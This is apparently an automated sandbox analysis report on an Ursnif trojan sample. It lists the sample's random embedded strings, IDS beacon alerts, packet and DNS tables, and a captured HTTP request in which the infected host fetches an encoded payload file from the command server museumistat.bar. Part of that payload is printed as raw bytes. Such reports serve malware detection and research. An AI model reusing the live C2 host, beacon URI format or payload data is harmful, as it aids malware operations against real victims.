                  UnredeemableCrednerite
                  LimuGymnasiast
                  CylindrocellularMeekhearted
                  UnctoriumUncontrite
                  AmylonAkov
                  UnguinalAlosa
                  BulbaceousAurodiamine
                  BasidiomyceteAlcoholization
                  RenunciantLimer
                  GyrocerasSnoozle
                  NycticoraxHoneyful
                  BatrachospermumOhmage
                  ExtensileSupervisorial
                  PeucitesBabloh
                  ReinforcerTimpani
                  RugbyReactionaryism
                  MoriformAeromotor
                  RetrogradismEchinus
                  EmersedHaymow
                  PenthoraceaeUnversed
                  HexagyniaUnbirdlimed
                  MicrocosmalHask
                  AcanthodeaUnactuated
                  InanimadvertenceHemiteratics
                  FlinterViverridae
                  AdrenaloneOreocarya
                  TypicalProsthetist
                  GenitureHumite
                  GriquaiteSemic
                  PerimetriticSnakebark
                  SuperstrongGuiltily
                  UredinoidUnexhaustible
                  SiluricTrombe
                  ChiaroscuristTemporality
                  SawhorseAlvus
                  MaddinglyAthecata
                  ZoomechanicsShoddylike
                  AeolistVertebrofemoral
                  HypermysticalSinlessness
                  CauraleHandhaving
                  IliaLibroplast
                  AzotolueneRattan
                  HungrilyUnoffensive
                  StrainproofWaka
                  PhytobiologicalWhalm
                  SubjudgeIncreaseful
                  DownwayPseudogryphus
                  RestesPresentimental
                  HeliographEntremets
                  PlexRhacianectes
                  BiochemistryHydrocephalous
                  OutlanceMultiradiate
                  TowmastCirrigrade
                  UngualGlossingly
                  SinologerMaximon
                  PagedomMasticura
                  LaryngiticAwd
                  UnenactedOctennially
                  DeadheadismBrownweed
                  SexivalencyAreocentric
                  CyanoplastidArtistical
                  UninervedRah
                  EpidoteChurr
                  PerceivableHeterogenous
                  GalvanolysisEnsue
                  OrthodoxicallyHelvellaceae
                  UnheardHemiteratics
                  RetrofractSensibilia
                  TrichosporangiumEupraxia
                  EnochicPrelusory
                  ConglobationPlatymeric
                  PinmakerKaffiyeh
                  QuippishBipedality
                  SkullfulHaggardness
                  SensationDactylopterus
                  SoldierheartedApodema
                  CaliciformCrome
                  DisinterestedlyAllanturic
                  CubicovariantTawpie
                  DacryosolenitisCheirosophy
                  DextrallyClerkdom
                  VoltameterOutgallop
                  PeridermiumBedright
                  DoeskinBilocular
                  CaressantUndismayed
                  SubtlistElasmobranch
                  ObeUnlevelness
                  PluckerianCystitis
                  PollenivorousPedipulation
                  SongySubjudge
                  KiladjaSkinning
                  CholesterateHogreeve
                  TebethTemporoauricular
                  PortraitlikeQuibbleproof
                  ColthoodUnegoist
                  ZaxOrnithosaur
                  AmylaseStringways
                  UnswungPrecentress
                  TinwarePachyblepharon
                  MesosternumOrrhoid
                  FavositoidPhyllodial
                  TambourerSimpletonish
                  AdenoidNonprohibitive
                  IntracollegiateMasterwork
                  IntensativeScrounging
                  PlanillaUnalliable
                  TeutophilePrepupal
                  LymphangiectaticTautochronism
                  PreacquittalPrecollect
                  PotamologyGrubstreet
                  ScoukSimpletonish
                  CheirosophyWheretoever
                  TautochronismDuctileness
                  TramlessMedicamentally
                  UnhuskedBiomicroscopy
                  LemographyResolidification
                  MultiradiateAngioparesis
                  IngressHousemaidenly
                  BandakaRenunciant
                  StrumpetryYancopin
                  HydroscopePincerlike
                  UnrememberHarlotry
                  UncelestializedRespersive
                  PhylacterySeepweed
                  SnakebarkMesofurcal
                  BleaklyPersecutor
                  DiversificationZoocarp
                  PrecompilationFutileness
                  PucklikeAthamantid
                  UnequitableCraspedon
                  DartinglyWhirled
                  TrophotaxisEurypharynx
                  StereobaticCaricous
                  DupableXanthomonas
                  DummeredBalancement
                  PlatymericCornein
                  ApiologistSlangy
                  CollateralnessPrecipitancy
                  PurbeckianThyrohyal
                  TomialIsothere
                  DaunterFrangibility
                  InauspiciousnessPlaintless
                  PuglianitePanneuritis
                  TrencherwiseLimu
                  BlitterEndomyces
                  AndrophyllHeterogenous
                  OphiopluteusSupersalesman
                  BarbarityDemagnetize
                  DibenzylHexachloroethane
                  RichdomFormicine
                  UpshutPhilotechnic
                  GirrAilanthic
                  RomanceishnessDryadetum
                  CeroliteAdoptionist
                  HippocentaurEchinus
                  CherubimicScowler
                  NomophylaxProbabl
                  AlkaligenDothiorella
                  MeetenNidal
                  PolypragmonicOedipean
                  LectualMachinization
                  StereoplasmicFolkright
                  WuduPesach
                  DistinctivenessZax
                  DonacidaeAgrogeological
                  PlatypodaDicarbonate
                  BushelmanAntioxygen
                  AlosaPunnology
                  ManualismCatadioptric
                  AwnerOsmous
                  SinglebarNiklesite
                  ImaginableIntrastromal
                  ThoroughwortEupraxia
                  UnwroughtManualism
                  ExesImprecant
                  MisascribeCheirosophy
                  SalicornDrusy
                  MuckiteMopane
                  OvarinCarking
                  MachinizationDogate
                  TritonessLobbyer
                  NiecelessCupseed
                  UndermimicStraitlacedness
                  OsGascon
                  PlethodontidaeCalyptorhynchus
                  MesonephridiumHispaniolate
                  AlytesUpscrew
                  HydrocystScoldingly
                  InfraconsciousDwarfishness
                  UnbirdlimedRoentgenize
                  ArmamentariumTillamook
                  PermissibilityPristis
                  FoodyZambal
                  NonpoisonousNaturelike
                  SuperabstractUnanalytical
                  PertusedPremillennialist
                  LogogramBorotungstic
                  SydneyiteStonyheartedness
                  DiscomfortinglyUnexcelling
                  SkeeHylist
                  NuculidPanneuritis
                  IsopicramicTrochantin
                  ProlificlyAmpullaria
                  PlagiaristicallySpirivalve
                  PyrolignousPolyact
                  ShemakaStaghunt
                  MammondomBurgrave
                  TrispermousHyblan
                  ZosmaEudaemonistical
                  DoctorshipPresentimental
                  LeucaurinNonoriginal
                  WappingProfessionalism
                  ViroleUnadornable
                  ConversationalistManualism
                  PteroclomorphicBulbaceous
                  AgalacticDiscursativeness
                  NoddyScrubber
                  HexaplaricSoldanelle
                  OvergodlySlantingly
                  SarcosporidUnlevelness
                  FleshenAlgometer
                  CuirBucconidae
                  SynarchicalRhacianectes
                  TemporoauricularGemellione
                  IndeterminablyNonenforceable
                  PerfectistBalaamite
                  UnshadyReinjure
                  UncommunicatedWardapet
                  TeaberryBiopyribole
                  ImperforatedAzoxybenzoic
                  DraffBothnian
                  CalcographyAboriginary
                  AnaschisticAnacidity
                  SemimythicalMyelotherapy
                  MolluscoideanReasonless
                  PredrawerCloisteral
                  XiphydriaUnsmokeable
                  PeripateticateAktivist
                  HenhussySenijextee
                  BadgerbrushUndenominationalize
                  NatroliteBewhig
                  FistulatedTaiyal
                  DemigorgeOvidae
                  MoineauKeratoplastic
                  GeoteuthisRefinable
                  TetanillaAzotoluene
                  LubricatorOptable
                  MbubaAlehoof
                  PrivateBuildCollophore
                  LogopedicsDipterous
                  ReabuseParasternal
                  OverloveCheeseflower
                  PendragonshipHornotine
                  CampanulariaePregladness
                  CompanyNameOrganoleptic
                  UnoffensiveOrlo
                  OssianizeSpotlessness
                  ScrolledCarbamic
                  NonoriginalTraction
                  BrachycranialAmblycephalidae
                  SpanemyOncetta
                  EvermoreAlosa
                  RashnessYan
                  UnderstandabilityDealership
                  LessnLessn
                  MultimetallismZabra
                  SowanLaudation
                  FabianistEntomological
                  MedicamentallyMesosternum
                  CryptogrammaUnspellable
                  HyphalIdiosepiidae
                  PictoriallyUnstraight
                  FrangibilityUnshady
                  FischeriteSepiary
                  MentorismUncommunicated
                  BiggHaruspex
                  SupershipmentMensural
                  VariotintedUnspeakable
                  BannetUnsoftened
                  UgaronoDivesture
                  WahpetonAlaskaite
                  OssifluentCurettage
                  FibrochondrostealInsequent
                  UnpeckedMashona
                  AccentuationSerapias
                  AinsellPopularly
                  TemporalityUnripeness
                  MethodicalnessDelomorphous
                  StraphangerFowler
                  TernaEquiponderant
                  ThiazoleHydrocele
                  IsoelectronicEncyrtidae
                  AcrocarpiOutshove
                  ShGravelweed
                  CetomorphicSubdatary
                  ScroungingProvivisectionist
                  Translation0x0409 0x04e4

                  Possible Origin

                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States

                  Network Behavior

                  Snort IDS Alerts

                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                  01/19/22-11:50:27.788887TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4974880192.168.2.331.41.44.3
                  01/19/22-11:50:30.910903TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975180192.168.2.331.41.44.3
                  01/19/22-11:50:30.910903TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975180192.168.2.331.41.44.3
                  01/19/22-11:50:32.709523TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975280192.168.2.331.41.44.3
                  01/19/22-11:50:32.735750TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:32.735750TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:33.094544TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975180192.168.2.331.41.44.3
                  01/19/22-11:50:33.094544TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975180192.168.2.331.41.44.3
                  01/19/22-11:50:34.706245TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.331.41.44.3
                  01/19/22-11:50:34.932451TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:34.932451TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:36.361098TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975680192.168.2.331.41.44.3
                  01/19/22-11:50:36.812525TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975280192.168.2.331.41.44.3
                  01/19/22-11:50:37.431406TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:37.431406TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:39.179826TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975680192.168.2.331.41.44.3
                  01/19/22-11:50:42.294394TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4975480192.168.2.331.41.44.3
                  01/19/22-11:50:42.294394TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975480192.168.2.331.41.44.3
                  01/19/22-11:51:35.953320TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976380192.168.2.362.173.145.37
                  01/19/22-11:51:35.953320TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4976380192.168.2.362.173.145.37
                  01/19/22-11:51:36.082177TCP2021813ET TROJAN Ursnif Variant CnC Beacon4976480192.168.2.362.173.149.135
                  01/19/22-11:51:36.082177TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4976480192.168.2.362.173.149.135

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 19, 2022 11:50:27.726514101 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:27.727549076 CET4974980192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:27.787806034 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:27.787961960 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:27.788887024 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:27.791126013 CET804974931.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:27.791309118 CET4974980192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:27.849400997 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.113239050 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.113308907 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.113351107 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.113379002 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.113470078 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.113518953 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.114420891 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.114464045 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.114502907 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.114533901 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.114583969 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.115042925 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.115084887 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.115123034 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.115164995 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.115190983 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175230026 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175297976 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175337076 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175375938 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175375938 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175410986 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175415993 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175417900 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175456047 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175482988 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175493956 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175508022 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175534964 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175549030 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175575972 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175586939 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175620079 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175636053 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175658941 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175674915 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175699949 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175714016 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175740004 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175755978 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175780058 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175793886 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175818920 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175832987 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175858021 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175890923 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175899029 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175935030 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175941944 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.175961971 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.175980091 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.176022053 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.176047087 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.176084995 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236424923 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236493111 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236535072 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236576080 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236614943 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236654043 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236692905 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236696959 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236733913 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236741066 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236747980 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236753941 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236758947 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236777067 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236815929 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236829996 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236855030 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236876011 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236893892 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236913919 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236931086 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236946106 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.236969948 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.236980915 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237009048 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237023115 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237047911 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237062931 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237088919 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237097979 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237127066 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237140894 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237169027 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237175941 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237209082 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237219095 CET4974880192.168.2.331.41.44.3
                  Jan 19, 2022 11:50:28.237251997 CET804974831.41.44.3192.168.2.3
                  Jan 19, 2022 11:50:28.237261057 CET4974880192.168.2.331.41.44.3

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Jan 19, 2022 11:50:27.684565067 CET5415453192.168.2.38.8.8.8
                  Jan 19, 2022 11:50:27.706737995 CET53541548.8.8.8192.168.2.3
                  Jan 19, 2022 11:50:30.798455000 CET5280653192.168.2.38.8.8.8
                  Jan 19, 2022 11:50:30.820369005 CET53528068.8.8.8192.168.2.3
                  Jan 19, 2022 11:50:32.609206915 CET5391053192.168.2.38.8.8.8
                  Jan 19, 2022 11:50:32.626358986 CET53539108.8.8.8192.168.2.3
                  Jan 19, 2022 11:50:32.634511948 CET6402153192.168.2.38.8.8.8
                  Jan 19, 2022 11:50:32.651271105 CET53640218.8.8.8192.168.2.3
                  Jan 19, 2022 11:50:36.258855104 CET6078453192.168.2.38.8.8.8
                  Jan 19, 2022 11:50:36.280985117 CET53607848.8.8.8192.168.2.3
                  Jan 19, 2022 11:51:34.793169975 CET4957353192.168.2.3208.67.222.222
                  Jan 19, 2022 11:51:34.809602976 CET5349573208.67.222.222192.168.2.3
                  Jan 19, 2022 11:51:34.817130089 CET4957453192.168.2.3208.67.222.222
                  Jan 19, 2022 11:51:34.833463907 CET5349574208.67.222.222192.168.2.3
                  Jan 19, 2022 11:51:34.838061094 CET4957553192.168.2.3208.67.222.222
                  Jan 19, 2022 11:51:34.854393959 CET5349575208.67.222.222192.168.2.3

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Jan 19, 2022 11:50:27.684565067 CET192.168.2.38.8.8.80x3086Standard query (0)museumistat.barA (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:30.798455000 CET192.168.2.38.8.8.80xb79cStandard query (0)museumistat.barA (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:32.609206915 CET192.168.2.38.8.8.80x18f7Standard query (0)museumistat.barA (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:32.634511948 CET192.168.2.38.8.8.80x114eStandard query (0)museumistat.barA (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:36.258855104 CET192.168.2.38.8.8.80xbae0Standard query (0)museumistat.barA (IP address)IN (0x0001)
                  Jan 19, 2022 11:51:34.793169975 CET192.168.2.3208.67.222.2220x1Standard query (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                  Jan 19, 2022 11:51:34.817130089 CET192.168.2.3208.67.222.2220x2Standard query (0)myip.opendns.comA (IP address)IN (0x0001)
                  Jan 19, 2022 11:51:34.838061094 CET192.168.2.3208.67.222.2220x3Standard query (0)myip.opendns.com28IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Jan 19, 2022 11:50:27.706737995 CET8.8.8.8192.168.2.30x3086No error (0)museumistat.bar31.41.44.3A (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:30.820369005 CET8.8.8.8192.168.2.30xb79cNo error (0)museumistat.bar31.41.44.3A (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:32.626358986 CET8.8.8.8192.168.2.30x18f7No error (0)museumistat.bar31.41.44.3A (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:32.651271105 CET8.8.8.8192.168.2.30x114eNo error (0)museumistat.bar31.41.44.3A (IP address)IN (0x0001)
                  Jan 19, 2022 11:50:36.280985117 CET8.8.8.8192.168.2.30xbae0No error (0)museumistat.bar31.41.44.3A (IP address)IN (0x0001)
                  Jan 19, 2022 11:51:34.809602976 CET208.67.222.222192.168.2.30x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                  Jan 19, 2022 11:51:34.809602976 CET208.67.222.222192.168.2.30x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                  Jan 19, 2022 11:51:34.809602976 CET208.67.222.222192.168.2.30x1No error (0)222.222.67.208.in-addr.arpaPTR (Pointer record)IN (0x0001)
                  Jan 19, 2022 11:51:34.833463907 CET208.67.222.222192.168.2.30x2No error (0)myip.opendns.com102.129.143.42A (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • museumistat.bar

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.34974831.41.44.380C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  TimestampkBytes transferredDirectionData
                  Jan 19, 2022 11:50:27.788887024 CET1107OUTGET /drew/wEnwCvgRr/tkjGrRWK504Gps4HB3Fh/a_2BgTA9pNLu5RTmMnf/cmF_2FoZExPeCfaavPGpw5/C4a_2B98FiRPO/vd2Nyn5c/h1bh48eCW9576sdvhYLet1i/wAsWnHJnYc/cKnuGYGL3HaarUE97/qNDbxnUrqa6o/sHAvWKK0ZF_/2FEfhnIyqYNHjo/0w_2F7ABHTCX38bGaal1i/N2IxD5P36ZAbXvHE/ihtoW7NXLZjCM45/tPYjxR5L6h/zPvdL.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:28.113239050 CET1108INHTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:28 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf40e475.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
